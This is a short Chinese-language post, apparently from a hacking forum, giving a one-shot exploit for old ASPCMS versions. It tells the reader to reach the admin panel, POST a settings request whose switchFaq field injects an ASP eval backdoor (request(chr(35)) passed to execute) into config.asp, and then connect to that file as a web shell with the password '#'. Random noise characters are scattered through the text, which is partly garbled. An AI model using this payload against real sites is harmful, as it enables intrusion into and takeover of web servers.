老的ASPCMS版本的秒杀拿SHELL漏洞: C3 h8 q3 a. h+ Z: O1 c! U4 a% G) _
( Z* ?. W7 r' A! k6 j+ r1 l
找到后台。。。然后' c; q( x- a. a) S& r
' r# ^0 ~! M8 @8 M m! [+ Z( ~
/admin/_system/AspCms_SiteSetting.asp?action=saves. M, m% r' {) p& l; U; C1 G2 G( O
0 B+ I2 x/ U3 O' {; A& d7 m; C" a直接POST
% m Y4 Q* d4 e9 c
: Z7 ~- F$ K# `" t( w. z' A' S0 OrunMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1: X; s' i: G1 @
# f" d W: i8 }# S( J
再连接配置文件config.asp 密码为#6 l1 i$ i3 `; u/ `
|